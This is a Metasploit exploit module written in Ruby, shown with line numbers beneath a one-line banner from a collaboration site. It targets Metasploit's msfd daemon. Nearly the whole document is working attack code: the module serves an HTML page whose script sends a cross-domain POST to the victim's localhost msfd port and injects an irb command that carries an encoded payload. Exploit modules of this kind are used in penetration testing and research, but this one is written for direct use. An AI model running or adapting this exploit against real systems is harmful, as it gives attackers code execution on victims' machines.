Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8
  include Msf::Exploit::Remote::HttpServer::HTML
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
     'Name'           => 'Metasploit msfd Remote Code Execution via Browser',
13
     'Description'    => %q{
14
      Metasploit's msfd-service makes it possible to get a msfconsole-like
15
      interface over a TCP socket. This module connects to the msfd-socket
16
      through the victim's browser.
17

18
      To execute msfconsole-commands in JavaScript from a web application,
19
      this module places the payload in the POST-data. These POST-requests
20
      can be sent cross-domain and can therefore be sent to localhost on the
21
      victim's machine. The msfconsole-command to execute code is 'rbi -e
22
      "CODE"'.
23

24
      Exploitation when the browser is running on Windows is unreliable and
25
      the exploit is only usable when IE is used and the quiet-flag has been
26
      passed to msf-daemon.
27
      },
28
      'License'        => BSD_LICENSE,
29
      'Author'         => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
30
      'Platform'       => 'ruby',
31
      'Arch'           => ARCH_RUBY,
32
      'Targets'        =>
33
        [
34
          [ 'Automatic', {}],
35
        ],
36
      'Payload'        =>
37
        {
38
          'Space' => 8192,  # Arbitrary limit
39
          'DisableNops' =>  'True',
40
          'BadChars' => "\x22\x0a"
41
        },
42
      'DisclosureDate' => '2018-04-11',  # Vendor notification
43
      'DefaultTarget'  => 0))
44

45
      register_options([
46
        OptString.new('REMOTE_IP', [true, 'Remote IP address when called from victim', '127.0.0.1']),
47
        OptString.new('REMOTE_PORT', [true, 'Remote port the service is running at', '55554'])
48
      ])
49
  end
50

51
  def exploit
52
    super
53
  end
54

55
  def on_request_uri(cli, request)
56
    msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
57
    sc = payload.encoded
58
    shellcode = "\\x" + sc.unpack('U'*sc.length).collect {|x| x.to_s 16}.join("\\x")
59
    var1 = rand_text_alpha(rand(6..11))
60
    var2 = rand_text_alpha(rand(6..11))
61
    html =  <<-EOS
62
<html>
63
<head></head>
64
<body>
65
<script>
66
var #{var1} = new XMLHttpRequest();
67
#{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true);
68
var #{var2} = String("#{shellcode}");
69
#{var1}.send("irb -e \\"" + #{var2} + "\\"\\n");
70
</script>
71
</body>
72
</html>
73
EOS
74
    print_status("#{msg} Sending HTML...")
75
    send_response(cli, html, { 'Content-Type' => 'text/html' })
76
  end
77
end
78

79